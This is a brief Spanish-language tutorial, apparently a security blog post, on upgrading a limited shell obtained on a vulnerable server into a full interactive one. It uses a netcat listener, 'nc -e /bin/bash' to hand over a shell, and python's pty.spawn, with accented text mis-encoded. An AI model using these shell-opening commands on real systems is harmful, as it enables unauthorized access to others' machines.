En algunas ocasiones conseguimos shell en algĂșn servidor vulnerable pero esta shell es realmente incĂłmoda ya que no se comporta exactamente como una shell regular, no nos hace echo de lo que escribimos, no aparece el prompt entre otras muchos inconvenientes.
En este artĂculo mostrarĂ© un sencillo truco para solventar este problema.
Para realizar la prueba pondremos a la escucha un socket en nuestro propio equipo en el puerto 7777.
nc -lvp 7777
Desde otra shell conectamos y comprobamos que no se comporta como una shell regular.
nc 127.0.0.1 7777 -e /bin/bash
id
ls
id
ls
Pero si arrancamos la shell desde Python y ya podremos utilizarla de forma normal.
python -c "import pty;pty.spawn('/bin/bash')"
Se trata de un sencillo truco pero que resulta sumamente Ăștil en ciertos escenarios.